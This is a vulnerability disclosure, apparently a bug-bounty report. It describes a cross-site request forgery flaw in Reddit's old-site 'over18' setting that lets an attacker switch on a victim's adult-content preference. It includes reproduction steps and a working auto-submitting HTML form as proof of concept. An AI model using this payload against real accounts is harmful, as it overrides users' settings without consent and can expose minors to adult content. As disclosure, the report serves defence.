CSRF (protection bypassed) to force a below 18 user into viewing an nsfw subreddit !

# Summary of the Issue A state-changing POST request to https://old.reddit.com/over18? lacked proper modhash validator leaving the sensitive action vulnerable to CSRF attacks. An attacker can trick users into executing the action, enabling/disabling "I am over eighteen years old" and willing to view adult content preference in the victim account. #Steps to reproduce 1. Create a reddit account and go to https://old.reddit.com/prefs/ 2. Scroll down and you'll see an option saying I am over eighteen years old and willing to view adult content. Turn that off. 3. Visit nsfw subreddit https://www.reddit.com/r/<nsfw_subreddit_here> and you'll see a window asking if you want to see nsfw content. 4. Open html file of html content shown below 5. Settings will get updated and you'll be able to view nsfw content. In other words you'll be able to view https://www.reddit.com/r/<nsfw_subreddit_here> ``` <html> <body> <form action="https://old.reddit.com/over18?dest=https%3A%2F%2Fold.reddit.com%2Fr%2F<nsfw_subreddit_here>%2F" method="POST"> <input type="hidden" name="over18" value="yes" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ```